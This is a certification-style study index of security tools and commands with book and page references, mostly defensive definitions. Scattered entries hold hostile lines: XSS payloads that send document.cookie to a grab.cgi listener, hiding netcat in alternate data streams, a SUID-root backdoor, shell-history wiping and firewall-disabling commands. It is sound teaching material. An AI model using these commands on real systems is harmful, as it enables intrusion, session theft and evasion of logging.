
Tools and Commands Book/Page Definitions

Tools and Commands  Book  Page  Definition


. (Unix) Unix files with a . at the beginning of the name are hidden
-- (SQLi) 4 105 Comment delimiter
; (SQLi) 4 105 query terminator
%d Format string attack; %d, %255d gives a value of 1 or 255
%n Format string attack; stores the number of characters written before it in a variable. Eg: hello%n = 5
%x Format string attack; goes to the next memory location and dumps the content of that memory location
0x00 3 107 ASCII null character
!exploitable 3 104 Microsoft tool- works with debugger- check crashes
./configure, make, make install 1 237 building linux tools - configure and make
./msfconsole start Metasploit
~/.bash_history 5 86 Shell history
/dev 1 213 stores devices (drives,terminals etc)
/dev/kmem 5 56 kernel code location
/etc/network/interfaces (edit) 1 230 set interface STATIC/DHCP + IP, mask…
/etc/passwd 4 36 stored account info: [login_name]:[encrypted_pass]:[UID_Nr]:[Default_GID]:[GECOS_Info]:[Home_Dir]:[Login_shell] eg. Smith:*:100:100:Fred
/etc/shadow 1 213
/home 1 213 contains users' home directories
/lib 1 213 contains common libraries
/mnt 1 213 mount point
/opt 1 213 optional items, specialized tools
/proc 1 213 virtual file system that stores kernel info
/root 1 213 root login account's home dir | 3 86, 129 if compromised, REBUILD system
/sbin/nologin 1 264 | 4 43 no logon capability for users with this shell
/tmp 1 213 temp data, cleared after boot
/usr 1 213 holds user programs & other data
/var 1 213, 266 /var/log/ - logs location | 5 85, 89, 101 editing; account entries
AAD3B43 4 20, 28, 51 encryption padding when using LANMAN
Abel 4 23 remote cmd shell, remote route table manager, lists TCP & UDP ports, remote passwd dump. Abel runs in the background and dumps info
about:cache 4 132 your browser cache
Accounting Entries in Unix 5 98 utmp: currently logged in users; wtmp: past user logins; btmp: failed logins; lastlog
account harvesting 4 91 observe how the server responds to valid/invalid user auth; use scripts like wget or perl
Account Harvesting Defenses 4 96 Pre: use the same error msgs all through, account lockout. Ide: frequent login attempts
account lockout 4 96 after a few bad logon attempts, temporary lockout
Achilles edit HTTP sessions
ACK 1 54 Network Perimeter Detection Example | 2 25, 82, 90, 93-95
Ack storms in Session Hijacking sequence numbers get out of sync due to the hijack (attacker spoofs packets) and the victim keeps sending ACK msgs
Acknowledgement Number field 5 128 TCP Header - 32 bit
Active Directory 4 5, 25, 33 Remotely stores passwords-server;enforce GP
Active OS fingerprinting sending packets and using behaviour to find OS,passive just listens for packets

# //Secureworks/Confidential - Limited External Distribution Page 1



Active OS fingerprinting defences close ports,use tools:IP personality,portspoof,Osfuscate,blackhole,stealth patch,etc

ActiveX 4 116, 147 | 5 190 active browser content
Add N Edit Cookies 4 144 free Firefox plugin to modify cookies
Address Resolution Protocol (ARP) 3 47-49, 51-52, 56, 84-85, 93 How it works; ARP Cache Poisoning; Defenses | 6 17 NO ARP cache poisoning! could turn into DoS
addsyms free code to re-add the system call table export if removed, as it is in Redhat 8/later
Adore 5 65 kernel rootkit / listens on a port
Advanced Intrusion Detection Environment (AIDE) 1 258 | 5 67 file integrity checker (~Tripwire)
Aggressive Mode 4 26 VPN and others use IKE, exchange new keys quickly across the network
Airbase-NG 2 68 started by Easy-Creds -> creates AP
Aircrack-ng 2 64 wireless sniffer for cracking WEP keys, need to sniff 50-1000 MB to succeed
AirDefense 2 75 Identify War Driving
AirMagnet 2 75 Identify War Driving
Airopeek (Omnipeek) 2 64 wireless specific sniffer
Alternate Data Streams in NTFS 5 105 if the file is moved, the hidden file is moved along; smbclient can get data from Windows ADS; dir /r
Alternate Data Stream .exe Example 5 110 type c:\tools\nc.exe > c:\tmp\test.txt:nc.exe, start c:\tmp\test.txt (XP), use wmic
Alternate Data Stream Notepad Example 5 108-109 notepad c:\tmp\test.txt:hidden.txt
Alureon Capabilities creates RC4 encrypted file sys at end of HDD. config.ini, FileDownload, InjectorAdd
Alureon/TDL Rootkit Family kernel-mode, for hiding, dodging AV; alters Windows file sys drivers: atapi.sys/iastor.sys
Anti-Reverse Engineering for Execs (Win) 5 19 pack the exe so that it runs, decompresses, and then you get the main exec
AntiVirus (AV) 1 53, 119 | 4 170 prevent installation if DoS | 5 9 can identify App-Level Trojan Horse Backdoor
Apache 1 13, 256 | 4 110, 124 ModSecurity offers solid filtering features
API Hooking 5 45, 48 change API calls for running procs to hide
APPEVENT.EVTX 5 114 one of the main Event Logs
APPLICATION.LOG 5 114 one of the primary temp event logs
Application Level Trojan Backdoors 5 9-16 client-server architecture: Poison Ivy, VNC, DameWare, Sub7, GhostRAT, Blackshades
archive.org 2 39 similar to Google; Wayback Machine
Armitage 3 113 Metasploit GUI interface
arp -a (Win) / arp -a or arp -e (Linux) 3 85 show ARP entries in Win / Linux
ARP-cache-poisoning 4 24 map IP (network layer) to MAC (data link layer)
ARP Cache poisoning in session Hijacking ARP spoof both sides (origin and dest) then hijack
ARP inspection prevents attackers from assuming IP addresses
ARP lab 3 70-77
Arpspoof 3 51-52 manipulate IP to MAC mapping. Feeds false ARP msgs into the LAN. Traffic is pointed to the attacker
ARPWatch 3 85 tool to check across the network for sniffing and session hijacking; monitors the LAN




Aruba Networks 2 75 Wireless IDS monitoring - Identify war driving


Assessment Questions 1 95-96 how widely spread is the affected platform, effect of the vuln, value of the sys and data on it, remote expl, public expl available
Assigning Handlers 1 50 identify and assess events on the sys to analyze
attack indicators using eventvwr.msc 1 74 event log svc stopped, Windows file protection disabled, telnet invoked, failed logon
Autonomous System Number (ASN) 3 8 defines which IP addresses a router is responsible for
Autoruns.exe utility 1 69 tool for reviewing the Auto Start Entry Points (ASEP)
Autopsy (Forensic software) 1 41, 43 Sleuth Kit GUI front end
Avatar (Rootkit for Win) 5 62 2 driver infections: 1 to bypass HIPS, 1 for persistence. Infects a random driver, detects VM
Avoiding SSL Warnings 1 3 65-66 compromise CA, bleed server keys from memory, bogus cert with MD5 collision
Avoiding SSL Warnings 2 3 67 compromise browser, social engr, MITM SSL strip, install cert on victim machine
Back Door Factory (BDF) 3 53 intercept EXEs and auto backdoor
Backdoor Alternate names (disguise) SCSI, UPS, server, client, svchost, initd, init, inet, cron, httpd. wmic process [pid] delete
Backdoor Capabilities 1 5 16 keystroke, dialog boxes, lockup/reboot, sys info, create VPNs, camera & audio capture
Backdoor Capabilities 2 5 screensaver passwds, dialup passwds, network acc passwds, dump from SAM & mem
Backdoor Capabilities 3 5 file sys control (cp, paste, add/delete, mount..), process & registry & network control
Backdoor Capabilities 4 5 multimedia control (video stream, audio capture, camera), redirect incoming TCP/UDP
Backdoors and Trojan Horses 5 6 some backdoors can also be trojans: looks innocent but is really nasty
Backdoor factory 3 146 backdoor existing executables
Bad Checksum Bypass split the atk in 2 halves with a TCP pkt with bad checksum; resets IDS buffer, 3rd pkt passes
base64 1 76, 146 | 5 142-143 $ echo <base64 string> | base64 --decode; VSAgent communication; python -> base64.b64decode(string)
Bell-LaPadula 4 123 low security zone cannot read but can write to the high sec zone; high sec reads down
Bettercap 3 51, 53, 58-59 sniffer - manipulate ARP mapping on target; DNS spoofer
BeyondTrust 2 119 vuln scanner
bg 1 227 keep job in background

BGP Hijacking 3 8, 9 1st line of defense is to know the baseline of normal traceroute information; contact your ISP if you notice drastic changes in route

Bind shell 3 115 Metasploit Payloads


Binders 5 18 aka Wrappers
BlackShades 5 9 App-lvl Trojan Horse Backdoor Suites
Bloodhound 2 143 maps system relationships,permissions; graphs quickest way to get
domain admin
Blue Coat 1 172 Web-filtering tool
Blue Pill 5 58 VM based rootkit
bmpmap print out the number of near-duplicate colors
Border Gateway Protocol (BGP) 3 8, 9 allows routers online to route correctly | 5 192
Bot Communication Channels 4 68 IRC TCP 6667, IRC on non-std ports, WASTE by AOL, HTTP to a site with cmds, Twitter
Bot Distribution 4 67 via worms, email attachment, application/game .exe, drive-by download, ads




Bot Functionality 4 72-73 morph code, run with sys priv, list shell, add/rm file shares, autostart, vuln scan other sys, packet floods, HTTP proxy for anonymous surfing, GRE, email harvest, turn off PC, delete bot, kill VMs
Bots - Rise of the Bots 4 66 maintains backdoor control, mail relay, anonymous HTTP proxy, DoS
Bridged network 1 8, 202 | 6 4, 8-9 ncpa.cpl then disable all other interfaces except the one you use, or force from VM
Bro 1 147-149, 153-158 Recovery Monitor tool
Bro logs 1 155, 157 Lab: searching Bro logs
Browser Exploit Against SSL/TLS (BEAST) 3 66 TLS 1.0; plant JS in browser, generate encrypted msgs based on chosen plaintext
Browser Exploitation Framework (BeEF) 4 76, 79, 81-83, 120 interactive control of browser via an XSS hook. Dozens of modules/functionality
Brute Force Attacks 4 12 trying every possible pass till success, eg. A, AA, AAA, AAB, ABB etc
btmp (/var/log/btmp) 5 89-90 bad login entries for failed login attempts
Buffer Overflow Exploit Sources 3 101 create from scratch, off the shelf from exploit-db.com, packetstormsecurity.com etc
Buffer Overflow 3 95 something very large placed in a box far too small; allows the attacker to run arbitrary functions
Buffer Overflow Defenses Identification 3 114 Ide: unusual crashes, exec of code from stack, HIPS alerts. Contain: deploy non-exec stacks. Era: rebuild
Buffer Overflow Defenses Preparation 3 106-107 patch sys, HIPS, application whitelisting. Implement non-executable system stack
Buffer Overflow Defenses Preparation 2 3 109 compile time: canary concept (to protect return pointers); creates hash of the return pointer and checks after func call
Buffer Overflow Defenses Preparation 3 3 110-113 control outgoing traffic, hunt teaming

Buffer Overflow Example in C 3 96 char bufferA[50]; char bufferB[16]; gets(bufferA); strcpy(bufferB, bufferA);

Buffer Overflow exploit best practice 3 107 make the exploit small enough to fit the buffer, avoid terminators like 0x00
Buffer Overflow vulnerable commands 3 103 strcpy, strncpy, strcat, sprintf, scanf, fgets, gets, getws, memcpy, memmove
Building a Team 1 30
Burp Proxy 4 91, 93-95, 104, 146 find and alter HTTP requests in real time
Cain 4 24 hash calculator, war driver, sniffer for passwds, Win hash dumper, RSA token gen… | 4 10, 16-33 Cain has a GUI and is used to gather info about the sys. Abel in background dumps info
Cain Defences 4 31 Pre: remove LANMAN hashes from local sys; disable LANMAN challenge/response auth across the net (use NTLMv2); enforce strong pass; use pass policy; implement SYSKEY; protect SAM db
Cain as password cracker 4 25 cracks Microsoft LANMAN, NT hash (stored in SAM and AD); LM challenge/response; NTLMv1&2 challenge/response; Kerberos 5 auth (used for auth across network)
Cain as password cracker 2 4 26 CISCO, APOP-MD5, RIPv2-MD5, OSPF-MD5, VRRP-HMAC-96, VNC 3DES, RADIUS, IKE pre-shared keys, Server 2k, MySQL 2k3
CAM Table (switches) records a station's MAC address and its corresponding switch port location. A timestamp for the entry is recorded, and its VLAN assignment




canary 3 124 hash of the return pointer to protect it; creates hash of the return pointer and checks after func call; 3 types: random, terminator and XOR
case insensitive - Windows 4 178 tasklist | find /I /c "notepad.exe"
case insensitive - Linux 4 184 ps aux | grep xeyes
cat (linux) 1 220 cat [OPTION] [FILE]... create single or multiple files, view content of a file, concatenate files, redirect output in terminal or to files
cat /etc/passwd 1 220 see contents of a file (linux)
cat ~/test_file 1 220 see content of a file
Cdoor - Non Promisc Sniffing Backdoor matches a pattern of packets to ports; if packets hit the proper ports, temporarily listens on 5002 with a shell
Cdoor - Non Promisc Sniffing Backdoor SYN packets to ports X, Y and Z; after Z, temporary listener on 5002, connect with netcat
Certificate Authority (CA) 3 60-61, 65, 84
CGI How it works (same for PHP, ASP, JSP) request to run CGI is in the URL requested of the server. POST and GET.
CGI program interface for executable programs with web pages.
CGI/Web scanner def same as Vulnerability scanner def + chrooted environment (can only see part of file
Chain of Custody (Identification) 1 97 don't delete files till case closed, control access to evidence, law enforcement to sign for evidence

Check sum hashed tools 2 13 md5sum & sha1sum (Unix), md5summer (Win); md5deep (Win & Unix) - all hash types
Cheops-ng network mapping
Chkrootkit 5 65 analyzes /bin/login to determine if a rootkit is installed
chmod (change permissions) 1 261 chmod 4111 /tmp/backdoor (SUID root) | 3 20 chmod 555 listener.sh | 5 100 chmod 555 init.conf (Everyone)
clearev (Meterpreter) 5 116 log wiping utility on a compromised Win machine
Code Caves 3 146 unused space in an EXE where malware is waiting
Code checking Tools 3 112 RATS, flawfinder, Fortify, Coverity, Veracode etc
Code Search Engine Tools koders.com; finds C, C++, Java etc; caches src code, no regex
Code Seeker 4 150 app-layer proxy firewall
Command and Control (C2) 1 133, 135-136 Def: setting egress firewall rule at the host's subnet perimeter | 5 62, 132-133, 136-137
Command Injection 4 98 web app takes input and processes it by invoking a shell. Add ; or & to run the next cmd
Command Injection Defenses 4 101 Pre: educate developers, vuln assessment. Ide: unusual outbound traffic, extra accs. Con: fix app
Command Injection examples 4 99-100 nslookup or ping the attk IP from the input field and sniff on the attk machine to see if you get it
Common Backdoors attacker takes over sys, installs backdoor; can be found via Nmap, fport, TCPView, lsof etc
Communication Channels 1 52 out-of-band communications, encrypted VoIP & emails (PGP), encrypted storage
Compression Ratio Info-leak Made Easy (CRIME) 3 66 undermines HTTPS by focusing on its compression routines
cone of silence 5 61 inside - visible hidden files; outside - hidden files are hidden to the user
Containment 1 98-115 short term, system back up, long term
Containment - Deployment 1 101 document and secure the incident scene
Containment - Forensic Image & back-up 1 110 dd does binary/incremental/bit-by-bit images on Unix/Win
Containment - Incident Characterization 1 102 FIRST to determine Category, Criticality and Severity




Containment - long term 1 113 patch sys & neighbors, IPS, null route, passwd change, alter trust, FW rules, remove accs & backdoor
Containment - Notify appropriate officials 1 104 manager, sec officer, vertical & horizontal reporting, ticket tracking system eg CyberSponse
Containment - Risk of continuing operation 1 112 collect logs from neighbor systems, how far did he get, business call
Containment - Short term 1 107 isolate switchport/VLAN, disconnect network access &/or power, alter DNS, null route
Counting half open connections Linux 4 189 netstat -nat (t for TCP) | grep -i listen
Covering Tracks Defenses 5 117-118 Pre: separate log server, crypto integrity check, write-once CD. Ide: gaps/corrupt logs
Covering Tracks ICMP Tunnel 5 124 carry data inside ICMP packets (ptunnel, loki..)
Covert Channel 5 120, 124, 127-128, 130, 132, 134, 136-145 Pre: keep atks off sys. Ide: know your processes, NIDS. Con: delete atk's progm, check other sys. Era: reimage if atk got root. Rec: monitor | 6 39 data can be carried in TCP/IP headers; file transfer, cmds for backdoor shell etc
Covert_TCP 5 127-131, 134 transmits info by entering ASCII in TCP/IP fields: IP ID, TCP initial Seq nr & TCP Ack Seq nr
Covert_TCP Bounce Mode client (SYN) with spoofed src_ip of receiver -> bounce server (SYN-ACK/RESET) -> receiving server
Covert_TCP Modes IP ID: drop ASCII in IP ID field. Seq mode: drop ASCII in ISN in the 3-way handshake
Covert_TCP Receiver ./covert_tcp -dest -source -source_port -dest_port -server -file
CoWPAtty 2 65 sniffs 4-way handshake and launches crypto attack against PSK
cp hackstuff.exe notepad.exe:stream1.exe 5 104 to hide files in a stream behind normal files
CpuHog 4 154 sets its priority to 16 (highest); Windows sets all other apps to 15. Pre: patch sys. Ide: single proc at 100%. Con: kill. Era: remove prog. Rec: reboot, msconfig
crafted packet can cause DoS for a webserver, formatted in a way not expected by the dev
create non-root account 1 222 useradd -d [Home_dir] [login] -> useradd -d /home/fred fred
CreateRemoteThread 5 45 create thread so DLL can run: CreateRemoteThread; free up space
crontab 1 253 # crontab -l -u root. Look for cron jobs scheduled by root/UID 0 | 5 44 altered to start malware at startup, hidden
Cross-Site Scripting (XSS) 4 76, 110, 113-126, 128-141, 147, 150 BeEF is an XSS framework and delivers malicious payload; based on reflecting input back to the user. Bounce code off the server back to the browser | 6 59 example
Cross-Site Scripting - admins atk 4 119 browser can be exploited while viewing logs by admin
Cross-site scripting Defenses: Ide, con.. 4 126 Ide: IDS logs, watch for coded info. Con: add filter. Era: remove atk data. Rec: anti-fraud
Cross-site scripting Defenses: Pre 4 124 same as SQL injection. Filter user input and output HTML; allow only alphanumeric
Cross-site scripting Defenses: Pre 2 4 125 disable scripting (with impact); IE 8 and new Chrome have XSS filter; Firefox NoScript
Cross-site scripting How it works 4 116-117 find vuln site, trick user to click link, code transmitted to vuln site, reflected & run in browser
Cross-site scripting How to launch 4 114 URL embedded in email or on third-party site, message boards
Cross-site scripting Internal Sys Scanning 4 119 scan internal network from browser, exploit home router, Jikto




Cross-site scripting - Log Server attack browser can be exploited while viewing logs in Splunk

Cross-site scripting Mechanisms 4 123 HTTP(s),Email,FTP,Swipe cards,postal card scanners,magnetic swipes


Cross-site scripting - XSS Shell set up webserver with XSS shell, plant hook on vuln site, victim browser compromised
Cross-site scripting - XSS Shell commands getCookie, alert(<message>), getSelfHtml, eval(<Javascript>), getKeyloggerData
Cross-site scripting Stealing a cookie site.com/search.php?word=<script>document.local='atk_script'+document.cookie;
Cross-site scripting Stealing a cookie <script>document.location='127.0.0.1:2222/grab.cgi?'+document.cookie</script>
Cross-site scripting Stored XSS 4 118 the malicious script is stored on the target website, if the site allows posting by 3rd parties
Cross-site scripting URL Obfuscation encode the URL to run your malicious code …%46I$6fri$...
Cryptography Detection has flat histogram,normal document has unpredictable histogram
CUDA 4 10 video drivers; used by Hashcat for faster pass cracking
Cyber crime laws in Canada 1. interception of electronic communications (up to 5 yrs). 2. unauthorized use of computer (up to 10)
Cyber crime laws in Germany data espionage on protected systems (3 yrs or fine). Anti-hack law - can't create tools
Cyber crime laws in Germany (2) unlawfully deletes, alters data (2 yrs). Interferes with data processing (5 yrs/fine)
Cyber crime laws in Japan all about access breach! 1 yr, up to 500k yen fine
Cyber crime laws in Singapore aligned with access control, integrity, confidentiality, availability and auth. $100k, 10 yrs
Cyber crime laws in Australia similar to UK; the data must have been stored on a Commonwealth computer
Cyber crime laws in the UK intent to secure access to data. The access is unauthorized. He is aware. Fines, up to 5 yrs
Cyber crime laws in the US death, injury to equipment, interception of electronic communication, stored electronic info
Cyber crime laws in the US (2) 1. access device, password, credit card etc. 2. unauthorized access to the computer itself
CyberCPR 1 105 tool to encrypt and hash all data uploaded
CyberSponse 1 104 commercial Incident Response ticket tracking system
Dan Kaminsky DNS Cache Poisoning tries nonexistent DNS entries trying to win the response race; when it does, it redirects
Data Execution Prevention (DEP) 3 123 marks stack as non-executable; avoidable by adjusting the reg value or ROP. Data execution prevention in Win.
Data Loss Prevention (DLP) 1 192 to bypass DLP use USB drive | 4 111 DLP tools may detect an exfiltration event for PII (not when encrypted) | 5 133 Gcat can bypass DLP
dd 1 41, 110, 178 | 5 22, 25-27, 34 tool for creating a binary image (bit-by-bit), including deleted and fragmented files
DDoS - Defenses 4 170 Pre: IDS/IPS, patch, AV, egress filter: drop outgoing pkts with src_addr not from the network
DDoS - Defenses 2 4 171 Pre: redundancy. Ide: flood of pkts, automated DDoS detection. Con: call ISP IH team
DDoS Architecture 4 164 use remote tool/shell to connect to 1 or more sys, use IRC to send cmds to bots
DDoS Detection and throttling tools 4 171 Arbor Networks Peakflow, Riverbed NetProfiler, Neustar SiteProtect, Cloudflare
DDoS tools 4 163 Mstream, Shaft, Trin00, Tribe Flood Network 2000, Stacheldraht. Nowadays only bots
Deceiving the attacker 1 146 use erroneous/misleading info to detect that a leak exists. Configure signatures for this data




Denial of Service (DOS) 4 73, 153-154, 163-171, 173, 175-176, 181, 183 Bot functionality; DoS attacks and Types
Denial of Service (DOS) Suites 4 161 Targa, Xcrush, spike, Toast. Exploit: bonk, jolt, land, nestea, newtear, syndrop, teardrop
df 1 257 check available HDD space
Dictionary attack 2 64 ASLEAP tool -> dictionary attack against LEAP authentication | 4 10, 11, 27 testing all words in a dictionary or a word file | 6 49 C:\> enum -D -u [user] -f [wordfile] [target]
Dig (UNIX - instead of nslookup) 2 26 | 6 29, 47 dig @[DNS_server_IP] [target_domain] -t AXFR; Zone Transfer attempt: # dig @10.10.10.45 target.tgt -t AXFR
dir command to list file streams but not display or print their content
Disable LANMAN Authentication 4 32 add NoLMHash key to registry; LMCompatibility reg value 3 or 5 (stop sending LANMAN challenge/response across the network)
Disaster Recovery (DR) 1 10 part of the Incident Handling plan
Distributed Denial of Service (DDoS) 2 14 spread using worm techniques | 4 154, 163 DoS attacks and Types; mostly launched by botnet
DLL Injection 5 45 allocate space: VirtualAllocEx; write name & code: WriteProcessMemory; create thread so DLL can run: CreateRemoteThread; free up space: VirtualFreeEx
DLL Injection and API Hooking 5 45 force exe to accept DLL. Hooking: atk undermines running proc by interacting with Windows
DMCA Digital Millennium Copyright Act 2 9 copyright protection and prohibition against reverse engineering

DNS Amplification 4 156-159 send small spoofed (60 byte) DNS query to many DNS servers, 512 bytes to victim. It is difficult to block the source because UDP is easy to spoof

DNS Cache ipconfig /displaydns


DNS Cache Poisoning - Get the Query ID attacker queries Alice's nameserver for any.evil.com; nameserver asks evil.com DNS server
DNS Cache Poisoning - Poison the cache evil sends request for bank.com; evil DNS server spoofs the response before the real DNS server

DNS Cache Poisoning Defense 1 Pre:Randomize src ports&query IDs,patch DNS servers and keep them up to date.

DNS Cache Poisoning Defense 2 Pre:Configure split DNS;internal dns server for internal queries, ext for ext queries

DNS Cache Poisoning Defense 3 Pre: Split-Split DNS;outside machine resolves int machines using ext-ext dns server

DNS Cache Poisoning Defense 4 Pre:Use SSL (https),Harden OS,use file integrity checker,IDS/IPS.Digitally sign DNS recs soon!

DNS Cache Poisoning Defense 5 Ide:nslookup,dig,ping.Con:flushdns cache.Erad:upgrade,random src ports,split-split


DNS Foiling 3 56 Run dnsspoof,victim send dns query,sniffed and fake ip given
DNS Overview Client->local nameserver->Root nameServer->org nameServer->sans.org name Server
DNS Query id 16 bit Transaction number
DNS Recon Defense 2 27 Preparation: do not allow zone xfer, use split DNS. Identification: look for TCP 53 traffic
DNS Spoof attack 3 56 same LAN not necessary; victim sends DNS query, sniffed and fake IP given
DNS Spoofing 3 57-60 remote possibility (between victim & DNS server); redirecting traffic; BETTERCAP; redirect graph




DNS to hash lookup tool (ISC) send DNS TXT record with hash in it, response with file details. dig +short…."cmd.exe..
DNSCat 3 11 Netcat functionality over DNS
DNSCat2 1 146, 148, 154 Lab DNSCat2 | 5 132 tool to use the DNS protocol for C2
DNSSEC 3 digitally signed DNS records to prevent spoofing
DNSStuff.com 2 50 web-based Recon/Attack tool
Domain Name Registration 2 18 Req: postal addr, phone nr, name of POC, authoritative DNS; useful for social engineering, war dialing, war driving, scanning
DoS attack - Types 4 154 Local (process kill, crash, CpuHog) and Network (malformed pkt & packet flood)
Drive Duplication 1 111 hardware tool for bit-by-bit copy
Dshield sensor network 1 15 40k sensors globally, collecting info on scans & attacks vs ports
Dsniff 2 6 injects packets to redirect traffic to it | 3 63-64 active sniffer
Dsniff Components Dsniff, arpspoof, msgsnarf, DNSSpoof, filesnarf, Webmitm, macof, mailsnarf, sshmitm
EASY-CREDS 2 67 allows attacker to create an evil wireless AP which he has full control over | 2 68 Aircrack-ng, DMESG holds DHCP logs, SSLStrip, Ettercap and URLSnarf for hijacking
Ebowla 3 146 Environmental Keyed Payloads + Golang language (hard for AV)
Editing Accounting Entries in Unix 5 90 utmp format; editing tools: mary.c, cloak.c, remove, logwedit.c, wtemped.c, wzap.c
Editing Log Files Unix 5 85 /etc/syslog.conf (to see where logs are stored). /var/log/secure, messages, httpd logs
Editing logs with physical access 5 115 boot into another OS (Linux); a tool that can edit the SAM proves it's possible. No release yet
Editing Shell History 5 87 shell history is written on exit, therefore kill -9 [pid], kill -9 bash, unset HISTFILE then kill -9 $$
editors (linux) 1 219 vi, gnu-emacs, pico, mcedit, nano, gedit eg. (gedit test_file)
Egg 3 109 package containing the NOP sled, the attacker machine code and the return pointer
Elasticsearch Amazon vulnerability allows you to do arbitrary read of files. Linuxtime 2014/2015 exploited it

Electronic Data Interchange (EDI) 4 123 possible to do XSS via EDI
Email - Gathering evidence 1 167 get message copy; collect logs from mail relays, FW/IDS logs. Attention to clock drift

Email - threats/hate speech 1 168 go through email evidence only and let physical sec/FBI handle the rest
Emergency Comm plan 1 33 call list, conf bridge, IR contact cards, test your process
EnCase 1 41 forensic software | 3 133 has known parser flaws; atks can execute cmds or crash apps
Enhanced Mitigation Experience Toolkit (EMET) 3 122 helps address vulnerabilities in 3rd party software (Microsoft)
Enum 2 139 -S [targetIP]: pulls list of shares, -U: users, -G: groups, -P: password policy | 6 16, 33, 49 detecting users and groups, and password guessing (Win)
enum -D -u [User] -f [wordfile] [TargetIP] 2 dictionary attack against a target; password guessing for SMB session using a dictionary file
enum -switch [TargetIP] 2 139 SWITCHes: -S: pulls list of shares, -U: users, -G: groups, -P: password policy
enum -u [UserName] -p [password] -G [TargetIP] 2 139 provide an authenticated SMB session to extract info from target




Eradication (vulnerability analysis) 1 117-121 Goal: get rid of artifacts, accs, code, software, etc. Determine cause and prevent; scan sys and network, search for vulns, look for exploits and backdoors
Eradication - Improving Defenses 1 120 apply FW/router filters, new name/IP, null route, change DNS name, apply patches
Eradication - Restoring from Backups 1 118 reloading the data from backup, adding any lost data and fixing the vulnerability
Error messages 3 9, 85 browser; SSH client errors - Identify sniffing & session hijacking | 4 91, 96, 104, 106 checking differences between them for Account Harvesting; looking for syntax/database err msgs to help with SQL injection
Espionage 1 160-164 stealing info to subvert the interest of an organization or government; competitive intelligence / legal espionage methods; thumbprint critical files, search keywords, network IPS/IDS
Ettercap 2 68 session hijacking tool | 3 51, 53, 58-59, 64 active sniff with ARP cache poisoning, hijack SSHv1, FTP, Telnet, HTTP etc, passive OS fingerprinting, connection killing, character insertion in various protocols
Event Definition 1 12 observable occurrence in a sys/network. Sys boot sequence, system crash, packet flood etc
Event Viewer (eventvwr.msc) 1 74, 190 cmd read> wevtutil qe security /f:text (for Win7↑) | 3 166 Sysevents -> Metasploit psexec
Event Viewer (eventvwr.msc) 5 114 System.log; Security.log; Application.log; Sysevent.evtx; Secevent.evtx; Appevent.evtx
eventquery.vbs /L security 1 74, 191 security event logs (eventquery) XP
Evidence - Best best possible evidence you can produce under very difficult circumstances
Evidence - Real and Direct Real = tangible/can be touched (USB, HD, printout). Direct = what you saw (logs, prt_scn)
Evil Insider Lab 1 187 1. trust. 2. difficult to determine/differentiate from ext hacker. Can cause most damage
evt2sys 5 117 tool for Win, reads event logs and forwards them to a syslog server
Exe32pack 5 19 packing algorithm / tool
Expert witness 1 179 allows you to search an image file for specific file types and character strings
Exploitable! 3 104 tool released by Microsoft that estimates how exploitable a flaw is
explorer.dll (rootkit hooking) 5 48 rootkit injects it in explorer.EXE to do API hooking
explorer.exe 3 168 target to migrate malicious processes | 5 39, 46 process map; it's a common target of injection
Extension Mechanisms for DNS (EDNS) Amplification attacks 4 157, 159 locate DNS servers that do recursive lookup, respond with 4K byte txt which is cached
Extortion 2 11 DoS extortion
EyeWitness 2 98 takes screenshots of websites, VNC, RDP servers and all detected webservers
Fast Flux (botnets) 4 69-71 attacker swaps between different systems to evade detection
Fast Flux Techniques 4 69 adds extra layer of obscurity; rapidly swapping resources among different systems to avoid takedown
Fast Flux Techniques How it works round-robin DNS records with 3-10 min TTL populated with proxies; double flux. Eg in phishing: spam bot emails victim, victim clicks on link, round-robin DNS
Fast Spreading Worms 4 60 exponential, spread shape of a golf stick; Warhol 99% in 15 mins, Flash 30 seconds
fg 1 227-228 bring job to foreground
Fgdump 1 57 system-level detects fgdump/netcat | 4 29, 35 temporarily deactivates AV, dumps passwd hash and reactivates AV; give dump to John for pass crack | 6 16 remote SAM pass hash dumper for Windows




fgets 3 96 fgets(bufferA, sizeof(bufferA), stdin); -> adds bounds checking
Fiddler (proxy tool) 4 146 analyze HTTP requests and responses, can alter passing scripts
File Integrity Checking Tool 5 67, 118, 155 Tripwire, OSSEC, AIDE
File Parser Buffer Overflow 3 133 any prog that opens a file; careful: WinZip, iTunes, WordPad, most AVs, Adobe, MS suite
filetype: (ext:) 2 40 Google search, preferably only suffixes
FIN (end of connection bit) 2 93, 95 FIN SCAN: go through firewall with FIN bit packets
Finding Buffer Overflows 3 103 check src code for known weak options, use Metasploit to scan language code (dll, exe)
Finding Buffer Overflows - Cram input 3 104 take a brute force approach, shove repeating pattern into inputs, look for crash

Finding Hidden streams 5 106 Use third party tools like LADS,streams,streams shell extension utility

finding files (Linux) 1 218 locate [prog_name]; updatedb (if the locate database is stale); find / -name whoami

Firebug 4 144 Firefox web page script editor and development tool for application manipulation
Firefox SSL warning msg 3 61 Unrecognized CA error
Firefox (NoScript extension) 4 125 Filters websites that run scripts; detects suspicious scripting activity
Firewalk Sends packets through a packet-filtering device to determine which ports it lets through
Firewalk - how it works Works on both stateful and stateless packet filters because the TTL is preserved; does not work through a proxy
Firewalk - phases Network discovery (traceroute to determine the number of hops to the packet filter) and scanning phase
Firewalk Defenses Prep: live with it / disallow ICMP Time Exceeded messages leaving your network / use a proxy. Ide: IDS signature
Firewalk Scanning phase TTL is set to one past the firewall; if an ICMP Time Exceeded comes back, the port is unfiltered
Firewall 101 2 125 Packet filtering, Stateful pkt filtering, Proxy firewall
firewall - disable Windows (Win 7 or earlier) 1 203 netsh firewall set opmode disable
firewall - disable Windows (Win 8 or later) 1 203 netsh advfirewall set allprofiles state off
FireSheep 3 68 Sniffs and grabs a user's HTTP auth session and cookies, giving the attacker access to the account
First In First Out (FIFO) 3 23-25, 35 mknod backpipe p creates a named pipe used to carry data back and forth on the command line (netcat relays)
FlashUpdate.exe 4 77, 83; 5 34, 36-37, 39 Common infected file/process in the books
Flawfinder (free tool) 3 127 Automated code checking for C and C++
p0f - passive OS fingerprinting Analyzes a packet capture (eg traffic to ports like 22, 25) to determine the OS without sending packets; helps predict potential attack patterns

FOCA - recon tool 2 41-42 Used to identify files hosted on sites; everything a Google search does and more
Fontanini Rootkit 5 63 Modifies the read function via file system hooking; eg filters netstat output to remove the attacker's connections

Forensics Images - tools 1 35, 37, 110, 113 dd; Memoryze (Mandiant) for analyzing memory on Windows; the Volatility framework. Both memory and file system; ideally a binary bit-by-bit image

Format string example - Windows sort "%d%d%s%s%n" - the sort command should crash
Format String attacks Defense Pre: pass an explicit format string to every printf, sprintf, fprintf and snprintf call (never user input as the format) and apply patches
Format String attacks Defense 2 Ide: same as buffer overflow
